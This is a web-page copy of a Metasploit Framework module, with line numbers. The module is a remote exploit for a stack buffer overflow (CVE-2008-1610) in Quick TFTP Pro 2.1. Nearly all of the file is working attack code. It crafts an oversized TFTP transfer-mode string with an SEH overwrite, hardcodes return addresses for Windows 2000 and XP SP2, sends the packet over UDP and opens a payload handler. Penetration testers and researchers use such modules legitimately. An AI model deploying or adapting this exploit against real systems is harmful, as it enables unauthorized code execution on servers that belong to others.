Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::Remote::Udp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Quick FTP Pro 2.1 Transfer-Mode Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in the Quick TFTP Pro server
19
product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting
20
in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
21
},
22
'Author' => 'Saint Patrick',
23
'References' => [
24
['CVE', '2008-1610'],
25
['OSVDB', '43784'],
26
['BID', '28459'],
27
['URL', 'http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/'],
28
],
29
'DefaultOptions' => {
30
'EXITFUNC' => 'process',
31
},
32
'Payload' => {
33
'Space' => 460,
34
'BadChars' => "\x00\x20\x0a\x0d",
35
'StackAdjustment' => -3500,
36
},
37
'Platform' => 'win',
38
'Targets' => [
39
['Windows Server 2000', { 'Ret' => 0x75022AC4 } ], # ws2help.dll
40
['Windows XP SP2', { 'Ret' => 0x74D31458 } ], # oledlg.dll
41
],
42
'DefaultTarget' => 1,
43
'DisclosureDate' => '2008-03-27',
44
'Notes' => {
45
'Reliability' => UNKNOWN_RELIABILITY,
46
'Stability' => UNKNOWN_STABILITY,
47
'SideEffects' => UNKNOWN_SIDE_EFFECTS
48
}
49
)
50
)
51
52
register_options(
53
[
54
Opt::RPORT(69)
55
]
56
)
57
end
58
59
def exploit
60
connect_udp
61
62
print_status("Trying target #{target.name}...")
63
64
sploit = "\x00\x02" + rand_text_english(4, payload_badchars) + "\x00"
65
sploit += "A" * 1019
66
seh = generate_seh_payload(target.ret)
67
sploit += seh
68
sploit += "\x00"
69
70
udp_sock.put(sploit)
71
print_status("Done.")
72
73
handler
74
disconnect_udp
75
end
76
end
77
78